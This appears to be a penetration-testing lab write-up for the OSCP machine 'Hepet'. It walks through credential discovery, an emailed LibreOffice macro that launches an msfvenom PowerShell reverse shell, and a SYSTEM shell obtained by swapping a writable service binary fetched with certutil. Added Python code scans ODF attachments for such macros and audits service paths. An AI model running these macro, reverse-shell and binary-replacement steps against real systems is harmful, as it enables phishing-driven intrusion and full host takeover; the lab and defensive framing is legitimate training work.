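OSCP Lab -- Hepet

Key points (1. Retrieving mail 2. Building a malicious macro document with msf 3. Delivering the malicious macro document by e-mail 4. Privilege escalation via service misconfiguration)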

1. nmap scan

┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV -sC -p- 192.168.188.140 --min-rate 2000
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-01 05:46 EST
Nmap scan report for 192.168.188.140
Host is up (0.28s latency).
Not shown: 65513 closed tcp ports (reset)
PORT      STATE SERVICE        VERSION
25/tcp    open  smtp           Mercury/32 smtpd (Mail server account Maiser)
|_smtp-commands: localhost Hello nmap.scanme.org; ESMTPs are:, TIME
79/tcp    open  finger         Mercury/32 fingerd
| finger: Login: Admin         Name: Mail System Administrator\x0D
| \x0D
|_[No profile information]\x0D
105/tcp   open  ph-addressbook Mercury/32 PH addressbook server
106/tcp   open  pop3pw         Mercury/32 poppass service
110/tcp   open  pop3           Mercury/32 pop3d
|_pop3-capabilities: TOP APOP EXPIRE(NEVER) UIDL USER
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
143/tcp   open  imap           Mercury/32 imapd 4.62
|_imap-capabilities: IMAP4rev1 OK CAPABILITY AUTH=PLAIN complete X-MERCURY-1A0001
443/tcp   open  ssl/http       Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23)
|_http-title: 400 Bad Request
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
445/tcp   open  microsoft-ds?
2224/tcp  open  http           Mercury/32 httpd
|_http-title: Mercury HTTP Services
5040/tcp  open  unknown
8000/tcp  open  http           Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23)
|_http-title: Time Travel Company Page
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
11100/tcp open  vnc            VNC (protocol 3.8)
| vnc-info: 
|   Protocol version: 3.8
|   Security types: 
|_    Unknown security type (40)
20001/tcp open  ftp            FileZilla ftpd 0.9.41 beta
|_ftp-bounce: bounce working!
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -r--r--r-- 1 ftp ftp            312 Oct 20  2020 .babelrc
| -r--r--r-- 1 ftp ftp            147 Oct 20  2020 .editorconfig
| -r--r--r-- 1 ftp ftp             23 Oct 20  2020 .eslintignore
| -r--r--r-- 1 ftp ftp            779 Oct 20  2020 .eslintrc.js
| -r--r--r-- 1 ftp ftp            167 Oct 20  2020 .gitignore
| -r--r--r-- 1 ftp ftp            228 Oct 20  2020 .postcssrc.js
| -r--r--r-- 1 ftp ftp            346 Oct 20  2020 .tern-project
| drwxr-xr-x 1 ftp ftp              0 Oct 20  2020 build
| drwxr-xr-x 1 ftp ftp              0 Oct 20  2020 config
| -r--r--r-- 1 ftp ftp           1376 Oct 20  2020 index.html
| -r--r--r-- 1 ftp ftp         425010 Oct 20  2020 package-lock.json
| -r--r--r-- 1 ftp ftp           2454 Oct 20  2020 package.json
| -r--r--r-- 1 ftp ftp           1100 Oct 20  2020 README.md
| drwxr-xr-x 1 ftp ftp              0 Oct 20  2020 src
| drwxr-xr-x 1 ftp ftp              0 Oct 20  2020 static
|_-r--r--r-- 1 ftp ftp            127 Oct 20  2020 _redirects
33006/tcp open  unknown
| fingerprint-strings: 
|   GetRequest, NULL, SMBProgNeg, SSLSessionReq: 
|_    Host '192.168.45.249' is not allowed to connect to this MariaDB server
49664/tcp open  msrpc          Microsoft Windows RPC
49665/tcp open  msrpc          Microsoft Windows RPC
49666/tcp open  msrpc          Microsoft Windows RPC
49667/tcp open  msrpc          Microsoft Windows RPC
49668/tcp open  msrpc          Microsoft Windows RPC
49669/tcp open  msrpc          Microsoft Windows RPC
Host script results:
| smb2-time: 
|   date: 2024-03-01T10:50:12
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 245.80 seconds


2.user priv

2.1 Log in to IMAP and read the mail:

## http://192.168.188.140:8000/
##
┌──(root㉿kali)-[~/Desktop]
└─#  curl -s http://192.168.188.140:8000/ | html2markdown
TIME TRAVEL

...

**Jonas K.**

SicMundusCreatusEst
...

## Access the mail server with jonas:SicMundusCreatusEst:
┌──(root㉿kali)-[~/Desktop]
└─# nc 192.168.188.140 143
* OK localhost IMAP4rev1 Mercury/32 v4.62 server ready.
tag login jonas@localhost SicMundusCreatusEst
tag OK LOGIN completed.
tag LIST "" "*"
* LIST (\NoInferiors) "/" INBOX
tag OK LIST completed.
tag SELECT INBOX
* 5 EXISTS
* 0 RECENT
* FLAGS (\Deleted \Draft \Seen \Answered)
* OK [UIDVALIDITY 1709414736] UID Validity
* OK [UIDNEXT 6] Predicted next UID
* OK [PERMANENTFLAGS (\Deleted \Draft \Seen \Answered)] Settable message flags
tag OK [READ-WRITE] SELECT completed.
tag fetch 1 BODY[HEADER] BODY[1]
* 1 FETCH (BODY[HEADER] {661}
Received: from spooler by localhost (Mercury/32 v4.62); 19 Oct 2020 12:28:52 -0700
X-Envelope-To: <jonas@localhost>
Return-path: <mailadmin@localhost>
Received: from kali (192.168.118.8) by localhost (Mercury/32 v4.62) with ESMTP ID MG000008;
   19 Oct 2020 12:28:51 -0700
Message-ID: <841577.174232469-sendEmail@kali>
From: "mailadmin@localhost" <mailadmin@localhost>
To: "jonas@localhost" <jonas@localhost>
Subject: Weak Password
Date: Mon, 19 Oct 2020 19:28:50 +0000
X-Mailer: sendEmail-1.56
MIME-Version: 1.0
Content-Type: multipart/related; boundary="----MIME delimiter for sendEmail-502425.856729136"
X-PMFLAGS: 570949760 0 1 YOM77S9H.CNM

 BODY[1] {134}
Hey Jonas,

Please change your password, you cannot use the same password as your one liner description, just dont.

Thanks!


)
tag OK FETCH complete.
tag fetch 2:5 BODY[HEADER] BODY[1]
* 2 FETCH (BODY[HEADER] {739}
Received: from spooler by localhost (Mercury/32 v4.62); 19 Oct 2020 12:28:41 -0700
X-Envelope-To: <jonas@localhost>
Return-path: <mailadmin@localhost>
Received: from kali (192.168.118.8) by localhost (Mercury/32 v4.62) with ESMTP ID MG000001;
   19 Oct 2020 12:28:40 -0700
Message-ID: <359094.447081105-sendEmail@kali>
From: "mailadmin@localhost" <mailadmin@localhost>
To: "agnes@localhost" <agnes@localhost>
Cc: "jonas@localhost" <jonas@localhost>,
 "magnus@localhost" <magnus@localhost>
Subject: Important
Date: Mon, 19 Oct 2020 19:28:39 +0000
X-Mailer: sendEmail-1.56
MIME-Version: 1.0
Content-Type: multipart/related; boundary="----MIME delimiter for sendEmail-808784.915440814"
X-PMFLAGS: 570949760 0 1 YGWVEUL6.CNM

 BODY[1] {311}
Team,

We will be changing our office suite to LibreOffice. For the moment, all the spreadsheets and documents will be first procesed in the mail server directly to check the compatibility. 

I will forward all the documents after checking everything is working okay. 

Sorry for the inconveniences.


)
* 3 FETCH (BODY[HEADER] {604}
Received: from spooler by localhost (Mercury/32 v4.62); 19 Oct 2020 12:28:52 -0700
X-Envelope-To: <jonas@localhost>
Return-path: <martha@localhost>
Received: from kali (192.168.118.8) by localhost (Mercury/32 v4.62) with ESMTP ID MG000006;
   19 Oct 2020 12:28:48 -0700
Message-ID: <898523.650921078-sendEmail@kali>
From: "martha@localhost" <martha@localhost>
To: "jonas@localhost" <jonas@localhost>
Subject: Love
Date: Mon, 19 Oct 2020 19:28:47 +0000
X-Mailer: sendEmail-1.56
MIME-Version: 1.0
Content-Type: multipart/related; boundary="----MIME delimiter for sendEmail-159605.589303286"

 BODY[1] {23}
Forever and ever?


)
* 4 FETCH (BODY[HEADER] {706}
Received: from spooler by localhost (Mercury/32 v4.62); 19 Oct 2020 12:29:03 -0700
X-Envelope-To: <jonas@localhost>
Return-path: <agnes@localhost>
Received: from kali (192.168.118.8) by localhost (Mercury/32 v4.62) with ESMTP ID MG00000A;
   19 Oct 2020 12:28:54 -0700
Message-ID: <135985.54474035-sendEmail@kali>
From: "agnes@localhost" <agnes@localhost>
To: "mailadmin@localhost" <mailadmin@localhost>
Cc: "jonas@localhost" <jonas@localhost>,
 "magnus@localhost" <magnus@localhost>
Subject: Contacts Information
Date: Mon, 19 Oct 2020 19:28:53 +0000
X-Mailer: sendEmail-1.56
MIME-Version: 1.0
Content-Type: multipart/related; boundary="----MIME delimiter for sendEmail-678721.390272589"

 BODY[1] {300}
Hi team!

I'm new here, will be doing PR for the company. 
Its a pleasure to work with all of you!

If you can please send to mailadmin the spreadsheet for printing with all the company contacts will be really apreciated .

Ela, can you install the office suite on my machine?

Cheers!


)
* 5 FETCH (BODY[HEADER] {602}
Received: from spooler by persephone.pmail.gen.nz (Mercury/32 v4.62); 8 Aug 2008 15:26:19 +1200
X-Envelope-To: David.harris@pmail.gen.nz
From: "David Harris" <David.Harris@pmail.gen.nz>
Organization: Pegasus Mail, Dunedin, New Zealand
To: David.harris@pmail.gen.nz
Date: Thu, 27 Jan 2011 15:00:00 +1200
MIME-Version: 1.0
Subject: Welcome to Pegasus Mail!
Message-ID: <489BBDAC.24975.43E28F31@David.Harris.pmail.gen.nz>
Priority: normal
X-mailer: Pegasus Mail for Windows (4.61 wb1)
Content-type: Multipart/Related; boundary="Message-Boundary-20828"
X-PMFLAGS: 573075584 0 1 Y6FSIJKV.CNM

 BODY[1] {4659}
--Alt-Boundary-10616.1138921265
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body

Welcome to Pegasus Mail!

This message has been placed in your new mail folder as part of the
Pegasus Mail installation process.

To see what's new in this version of Pegasus Mail, please go to the
"Help" menu and choose "What's new in this version".

Pegasus Mail has a very rich help system, accessible from the "Help"
menu above. As well as the help system, a full manual for Pegasus
Mail has been installed in the same directory as the program - it is
called "manual.pdf" and can be viewed using Adobe Acrobat or any
other program that can display PDF files.

If you need technical support or information and cannot find what
you need in the help system or manual, please visit the Pegasus Mail
user community at http://community.pmail.com

We hope you enjoy using Pegasus Mail!

David Harris
and the Pegasus Mail test team.

##


2.2 The mail reveals the office suite: LibreOffice

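The mail contains no sensitive information such as user credentials, but it does reveal the office suite in use: LibreOffice. From these e-mails we learn that the mailadmin@localhost address is processing spreadsheets, and that the office suite is LibreOffice. This probably means it will accept .ods or .xls files, which could be a good opportunity for a macro attack.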

2.3 Build a LibreOffice document carrying a malicious macro:

## Generate the malicious macro payload with msf:
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.198 LPORT=443 -f hta-psh -o evil.hta

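## evil.hta contains the following command. It is too long for the VBA length limit, but a VBA variable is not subject to that limit, so a script is used to split it: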
"powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBT....QAcwApADsA"

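## transform.py:
# Split the long command into 50-character chunks and print each chunk
# as a Basic string-concatenation statement.
s = "powershell.exe -nop -w hidden -e aQBmA...CQAcwApADsA"

n = 50  # chunk length
for i in range(0, len(s), n):
    chunk = s[i:i + n]
    print('Str = Str + "' + chunk + '"')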

## 
┌──(root㉿kali)-[~/Desktop]
└─# python3 transform.py    

## Create the macro in LibreOffice:
## Note: add Dim Str As String, the cmd.exe prefix, and the final Shell(Str)

Sub Main

	Dim Str As String
	
	Str = Str + "cmd.exe /C powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4Ad"
	
	Shell(Str)
	
End Sub


## Create a new spreadsheet document:

## Insert the macro:

[Screenshots not preserved: the hta file; processing the macro; creating a spreadsheet; creating the macro; inserting the macro into the document]

2.4 Deliver the malicious macro document by e-mail:

## -u subject:
## -m body:
## -a attachment:
┌──(root㉿kali)-[~/Desktop]
└─# sendemail -f 'jonas@localhost' -t 'mailadmin@localhost' -s 192.168.188.140:25 -u 'Your spreadsheet'  -m 'Here is your requested spreadsheet' -a /root/Documents/a.ods 
Mar 02 22:54:03 kali sendemail[2758283]: Email was sent successfully!
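
Seen from the receiving side, the attachment built in 2.3 and mailed in 2.4 can be flagged before anyone opens it. The Python check below is an added example, not part of the original write-up: it lists the Basic modules embedded in an ODF attachment, rejoins chunked string literals before looking for encoded PowerShell, and reports document event bindings. The function names, verdict labels and the inert sample from build_sample() are constructed for illustration, and binding the macro to a document-load event is an assumption, since the page's screenshots are missing.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

MAX_MEMBER = 5 * 1024 * 1024  # do not inflate oversized ZIP members
RISKY_CALL = re.compile(r"\b(Shell|CreateObject|CreateUnoService)\s*\(", re.I)
# -e, -ec and -enc... are accepted spellings of -EncodedCommand
ENCODED_PS = re.compile(r"powershell(\.exe)?\s.*?\s-(?:e|ec|enc\w*)\s+\S", re.I)
STRING_LIT = re.compile(r'"([^"]*)"')


def _local(name):
    """Strip the XML namespace so matching does not depend on its URI."""
    return name.rsplit("}", 1)[-1]


def _parse(zf, name):
    """Parse one ZIP member as XML, refusing oversized or entity-bearing input."""
    if zf.getinfo(name).file_size > MAX_MEMBER:
        return None
    raw = zf.read(name)
    if b"<!ENTITY" in raw:  # entity declarations enable expansion bombs
        return None
    try:
        return ET.fromstring(raw)
    except ET.ParseError:
        return None


def scan_odf(data):
    """Inspect one ODF attachment (raw bytes) and return macro findings."""
    out = {"modules": [], "risky_calls": [], "encoded_powershell": False,
           "auto_run": []}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        out["error"] = "not a ZIP container"
        return out
    with zf:
        for name in zf.namelist():
            root = None
            # Document-embedded Basic libraries live under Basic/<Library>/
            if name.startswith("Basic/") and name.endswith(".xml"):
                root = _parse(zf, name)
            if root is not None and _local(root.tag) == "module":
                source = "".join(root.itertext())
                out["modules"].append(name)
                out["risky_calls"] += sorted(
                    {m.group(1).lower() for m in RISKY_CALL.finditer(source)})
                # Rejoin the literals so a command split into
                # Str = Str + "..." chunks is matched as one string.
                joined = "".join(STRING_LIT.findall(source))
                if ENCODED_PS.search(joined):
                    out["encoded_powershell"] = True
            elif name == "content.xml":
                doc = _parse(zf, name)
                for el in (doc.iter() if doc is not None else ()):
                    if _local(el.tag) != "event-listener":
                        continue
                    attrs = {_local(k): v for k, v in el.attrib.items()}
                    out["auto_run"].append(
                        (attrs.get("event-name"), attrs.get("href")))
    out["verdict"] = ("quarantine" if out["modules"] and
                      (out["risky_calls"] or out["auto_run"]) else
                      "review" if out["modules"] else "pass")
    return out


def build_sample(with_macro):
    """Constructed ODS for exercising scan_odf; the payload is a placeholder."""
    basic = ('Sub Main\n Dim Str As String\n'
             ' Str = Str + "cmd.exe /C power"\n'
             ' Str = Str + "shell.exe -nop -w hidden -e QUJDRA=="\n'
             ' Shell(Str)\nEnd Sub\n')
    module = ('<?xml version="1.0" encoding="UTF-8"?>'
              '<script:module xmlns:script="http://openoffice.org/2000/script" '
              'script:name="Module1" script:language="StarBasic">'
              + escape(basic) + '</script:module>')
    listener = ('<office:scripts><office:event-listeners>'
                '<script:event-listener script:language="ooo:script" '
                'script:event-name="dom:load" xlink:type="simple" '
                'xlink:href="vnd.sun.star.script:Standard.Module1.Main'
                '?language=Basic&amp;location=document"/>'
                '</office:event-listeners></office:scripts>')
    content = ('<?xml version="1.0" encoding="UTF-8"?>'
               '<office:document-content '
               'xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" '
               'xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" '
               'xmlns:xlink="http://www.w3.org/1999/xlink">'
               + (listener if with_macro else '') +
               '<office:body/></office:document-content>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.spreadsheet")
        zf.writestr("content.xml", content)
        if with_macro:
            zf.writestr("Basic/Standard/Module1.xml", module)
    return buf.getvalue()
```

A scanner that matches line by line would miss the command in the constructed sample, because the word is split across two literals; joining the literals first is what makes the 50-character chunking irrelevant to detection.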
                                                                         


2.5 Reverse shell:

 nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.45.198] from (UNKNOWN) [192.168.188.140] 49795
Microsoft Windows [Version 10.0.18363.1139]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\LibreOffice\program>whoami
whoami
hepet\ela arwel

C:\Program Files\LibreOffice\program>

3. root priv

3.1 Privilege escalation via service misconfiguration:

## Query services
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
...
Veyon Service     VeyonService      C:\Users\Ela Arwel\Veyon\veyon-service.exe    Auto UnistackSvcGroup    Auto
...

##
C:\>sc qc VeyonService
sc qc VeyonService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VeyonService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\Ela Arwel\Veyon\veyon-service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Veyon Service
        DEPENDENCIES       : Tcpip
                           : RpcSs
        SERVICE_START_NAME : LocalSystem

##
kali@kali:~$  msfvenom -p windows/shell_reverse_tcp LHOST=192.168.118.8 LPORT=443 -f exe -o veyon-service.exe

## We start a simple Python HTTP server to transfer the file.
kali@kali:~$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Now, on the remote Windows machine, we back up the service binary and download our malicious version.

C:\>cd C:\Users\Ela Arwel\Veyon\

C:\Users\Ela Arwel\Veyon>move veyon-service.exe veyon-service.bak
        1 file(s) moved.

C:\Users\Ela Arwel\Veyon>certutil -f -urlcache http://192.168.118.8:8000//veyon-service.exe veyon-service.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

## After setting up a new listener and rebooting the machine, we receive a SYSTEM shell.
kali@kali:~$ sudo nc -lvnp 443
listening on [any] 443 ...
## Reboot the system:
C:\Users\Ela Arwel\Veyon>shutdown /r
shutdown /r
kali@kali:~$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.45.198] from (UNKNOWN) [192.168.188.140] 49669

Microsoft Windows [Version 10.0.18363.1139]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
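
The root cause in 3.1 is a LocalSystem auto-start service whose binary sits inside a user profile, where the profile owner can replace it. The audit below is an added example, not part of the original write-up: it parses saved `sc qc` output and flags privileged services whose image lies outside administrator-only directories. The VeyonService block is copied from the page; the other two services, the function names and the issue labels are constructed, and the system drive is assumed to be C:.

```python
import re

PRIVILEGED = {"localsystem", "nt authority\\system"}
# Directories only administrators can write to by default (assumption: C: drive).
PROTECTED = ("c:\\windows\\", "c:\\program files\\",
             "c:\\program files (x86)\\")
USER_PROFILES = "c:\\users\\"

SAMPLE = r"""
SERVICE_NAME: VeyonService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\Ela Arwel\Veyon\veyon-service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Veyon Service
        DEPENDENCIES       : Tcpip
                           : RpcSs
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: ExampleUpdater
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : "C:\Program Files\Example\updater.exe" --service
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: ExampleAgent
        START_TYPE         : 3   DEMAND_START
        BINARY_PATH_NAME   : C:\Tools\agent\agent.exe
        SERVICE_START_NAME : LocalSystem
"""  # first block is from the page; the last two are constructed


def parse_sc_qc(text):
    """Turn concatenated `sc qc` output into one dict per service."""
    services, cur = [], None
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]{3,})\s*:\s*(.*?)\s*$", line)
        if not m:
            continue  # banner lines and DEPENDENCIES continuation lines
        key, val = m.groups()
        if key == "SERVICE_NAME":
            cur = {"SERVICE_NAME": val}
            services.append(cur)
        elif cur is not None:
            cur[key] = val
    return services


def image_path(binary_path_name):
    """Extract the executable from BINARY_PATH_NAME, quoted or unquoted."""
    m = re.match(r'\s*(?:"([^"]+)"|(.+?\.exe)(?=\s|$))',
                 binary_path_name, re.I)
    return (m.group(1) or m.group(2)) if m else None


def audit_services(text):
    """Flag privileged services whose image is outside admin-only paths."""
    findings = []
    for svc in parse_sc_qc(text):
        image = image_path(svc.get("BINARY_PATH_NAME", ""))
        account = svc.get("SERVICE_START_NAME", "").lower()
        if image is None or account not in PRIVILEGED:
            continue
        low = image.lower()
        if low.startswith(USER_PROFILES):
            issue = "user-profile-binary"      # profile owner can replace it
        elif not low.startswith(PROTECTED):
            issue = "unprotected-location"     # needs an ACL review
        else:
            continue
        findings.append({
            "service": svc["SERVICE_NAME"],
            "image": image,
            "issue": issue,
            # auto-start means a replaced binary runs at the next boot
            "auto_start": "AUTO_START" in svc.get("START_TYPE", ""),
        })
    return findings
```

The location check is a heuristic: confirm each finding against the file and directory ACLs (for example with icacls), then move the binary to an administrator-only directory or remove write access for non-administrators.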

4. Summary:

